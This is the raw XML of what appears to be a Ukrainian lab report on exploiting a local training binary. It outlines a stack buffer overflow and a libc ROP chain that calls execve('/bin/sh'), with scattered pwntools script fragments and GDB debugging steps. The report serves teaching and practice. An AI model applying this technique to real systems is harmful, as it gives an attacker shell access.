          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t xml:space="preserve"> *0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t>4012</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C3014" w14:textId="5A911C77" w:rsidR="00B40BE7" w:rsidRPr="00EA78D5" w:rsidRDefault="00B40BE7" w:rsidP="00B40BE7">
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t xml:space="preserve"> *0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t>40131</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132B36C" w14:textId="77777777" w:rsidR="004912B3" w:rsidRPr="00054FBF" w:rsidRDefault="004912B3" w:rsidP="00B40BE7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E068A1E" w14:textId="27E3AE64" w:rsidR="00E67149" w:rsidRDefault="00E27DE0" w:rsidP="00E27DE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть експлойту </w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00B5538D">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04A75">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF63250" w14:textId="4031A768" w:rsidR="00404D1E" w:rsidRPr="00404D1E" w:rsidRDefault="00CD3FD0" w:rsidP="00E27DE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004265FC" w:rsidRPr="005014BA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004265FC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайти </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">адреси </w:t>
      </w:r>
      <w:r w:rsidR="004265FC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>функці</w:t>
      </w:r>
      <w:r w:rsidR="00FC5CF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ї</w:t>
      </w:r>
      <w:r w:rsidR="004265FC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D44898" w:rsidRPr="00642E9B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r w:rsidR="00D44898">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00D80EC1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80EC1" w:rsidRPr="00D80EC1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та ряд</w:t>
      </w:r>
      <w:r w:rsidR="00FC5CF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ка</w:t>
      </w:r>
      <w:r w:rsidR="00D80EC1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80EC1" w:rsidRPr="00D80EC1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="002F3CFE" w:rsidRPr="002F3CFE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r w:rsidR="00D80EC1" w:rsidRPr="00D80EC1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00A04A75" w:rsidRPr="00404D1E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="005014BA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>бібліоте</w:t>
      </w:r>
      <w:r w:rsidR="00FC5CF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ці</w:t>
      </w:r>
      <w:r w:rsidR="005014BA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005014BA" w:rsidRPr="00A04A75">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidR="005014BA" w:rsidRPr="00A9607B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005014BA" w:rsidRPr="00A04A75">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="005712BF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BEA617" w14:textId="461501E3" w:rsidR="00E67149" w:rsidRDefault="00CD3FD0" w:rsidP="00E27DE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2. Знайти гаджети</w:t>
      </w:r>
      <w:r w:rsidR="00456CE4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, які встановлюють значення регістрів </w:t>
      </w:r>
      <w:r w:rsidR="00456CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r w:rsidR="00456CE4" w:rsidRPr="00456CE4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00456CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r w:rsidR="00456CE4" w:rsidRPr="00456CE4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00456CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r w:rsidR="00C12724">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B70255">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00404D1E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9607B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00404D1E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="005712BF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222BB6BE" w14:textId="536ADB16" w:rsidR="000178D7" w:rsidRPr="005712BF" w:rsidRDefault="000178D7" w:rsidP="00E27DE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00B2470D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">обудувати </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2470D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюжок</w:t>
      </w:r>
      <w:r w:rsidR="00B2470D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, який </w:t>
      </w:r>
      <w:r w:rsidR="003D7ECA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>викликає</w:t>
      </w:r>
      <w:r w:rsidR="00B2470D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B2470D" w:rsidRPr="00B2470D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>execve("/bin/sh", 0, 0)</w:t>
      </w:r>
      <w:r w:rsidR="005712BF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD0530D" w14:textId="4E50C01E" w:rsidR="00E27DE0" w:rsidRPr="001E337F" w:rsidRDefault="00291E58" w:rsidP="00E27DE0">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Заповнити буфер 8-ма байтами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F10DC" w14:textId="6144DE75" w:rsidR="00E27DE0" w:rsidRDefault="00291E58" w:rsidP="00E27DE0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00757F87">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Переповнити буфер, додаючи 1337</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00553091">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00E46D15">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00E46D15">
        <w:t>539</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00553091">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00E46D15">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>щоб задовільнити умову.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31651905" w14:textId="02A12D8F" w:rsidR="0084068D" w:rsidRPr="002045AC" w:rsidRDefault="00291E58" w:rsidP="00CD03FF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Перезаписати адресу повернення з ф</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00F70B1A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E27DE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00F70B1A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E27DE0" w:rsidRPr="00F70B1A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00BC4D8A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="00BC4D8A" w:rsidRPr="00F70B1A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC4D8A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюжком</w:t>
      </w:r>
      <w:r w:rsidR="000F00B3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068C8EB" w14:textId="77777777" w:rsidR="00D87B4D" w:rsidRPr="00D87B4D" w:rsidRDefault="00D87B4D" w:rsidP="00D87B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D87B4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D87B4D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main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bc.address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7ffff7d8d000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op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OP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bc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ADGETS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op_rdi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rdi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t xml:space="preserve">    pop_rsi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rsi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op_rdx_rbx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rdx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execve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ibc.sym[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87B4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execve"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insh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ext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bc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arch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/bin/sh"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OP CHAIN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execve("/bin/sh", 0, 0)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di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insh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si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op_rdx_rbx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aw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execve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uffer overflow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8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ax before "cmp eax, 0x539"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64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337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buf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8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D87B4D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sp before "ret"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bytes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op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nd_bad_bytes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uf = cyclic(200)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87B4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D87B4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87B4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ROP CHAIN"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ro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ump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g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BUFFER"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dump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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87B4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eractive</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87B4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2854031A" w14:textId="77777777" w:rsidR="00D87B4D" w:rsidRPr="00D87B4D" w:rsidRDefault="00D87B4D" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FC3802" w14:textId="2EF386F7" w:rsidR="00587B7C" w:rsidRPr="00733A64" w:rsidRDefault="00587B7C" w:rsidP="00587B7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C654F5">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>Запустимо експлойт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00DE69E1">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB462D">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00C654F5">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">родебажимо </w:t>
      </w:r>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00695755">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="00733A64">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD6278" w14:textId="7487C8AC" w:rsidR="00587B7C" w:rsidRPr="00803FAB" w:rsidRDefault="00587B7C" w:rsidP="00587B7C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>$ python3 task</w:t>
      </w:r>
      <w:r w:rsidR="00DE69E1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B762D8" w14:textId="6C89E984" w:rsidR="00587B7C" w:rsidRPr="002C640E" w:rsidRDefault="00E24A12" w:rsidP="00587B7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зупинимося н</w:t>
      </w:r>
      <w:r w:rsidR="00587B7C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а другому брейкпо</w:t>
      </w:r>
      <w:r w:rsidR="00673270">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="00587B7C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>нті (</w:t>
      </w:r>
      <w:r w:rsidR="00587B7C" w:rsidRPr="001E3EB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x40131c</w:t>
      </w:r>
      <w:r w:rsidR="00587B7C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B65508">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та поглянемо на</w:t>
      </w:r>
      <w:r w:rsidR="00587B7C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> стек:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7339B3" w14:textId="3EDB978C" w:rsidR="005C7BE8" w:rsidRDefault="00BB462D" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F0EAE27" wp14:editId="65940F03">
            <wp:extent cx="6645910" cy="3488690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="182243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37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287" w14:textId="77777777" w:rsidR="002907AB" w:rsidRDefault="002907AB" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B13B721" w14:textId="593423CD" w:rsidR="005C7BE8" w:rsidRPr="00A87EF7" w:rsidRDefault="009C4B90" w:rsidP="00CD03FF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Перевіримо базову адресу </w:t>
      </w:r>
      <w:r w:rsidRPr="004730C7">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7" w:rsidRPr="004730C7">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>c.so</w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7" w:rsidRPr="00A87EF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та адресу </w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7" w:rsidRPr="004730C7">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00A87EF7" w:rsidRPr="00A87EF7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF4DECA" w14:textId="77777777" w:rsidR="00565B0B" w:rsidRPr="00CD1AF9" w:rsidRDefault="00565B0B" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> info proc map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED2300B" w14:textId="33826B30" w:rsidR="00953FC1" w:rsidRPr="00953FC1" w:rsidRDefault="00953FC1" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D56E615" wp14:editId="08A7128B">
            <wp:extent cx="6645910" cy="1449705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="26769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95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161" w14:textId="4F13CA8B" w:rsidR="0084068D" w:rsidRPr="00CD1AF9" w:rsidRDefault="00565B0B" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD1AF9">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> p system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08355901" w14:textId="69446680" w:rsidR="00A310DE" w:rsidRDefault="00A310DE" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001D1FA2" wp14:editId="7853493D">
            <wp:extent cx="6571429" cy="619048"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="12903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9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2DF0" w14:textId="77777777" w:rsidR="00943CEA" w:rsidRDefault="00943CEA" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78258303" w14:textId="701EB1D5" w:rsidR="00F87F34" w:rsidRDefault="00EB1448" w:rsidP="00F87F34">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виконаємо експлойт</w:t>
      </w:r>
      <w:r w:rsidR="00F87F34">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> без дебагу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7C316" w14:textId="6D2BEFCE" w:rsidR="00F87F34" w:rsidRPr="00803FAB" w:rsidRDefault="00F87F34" w:rsidP="00F87F34">
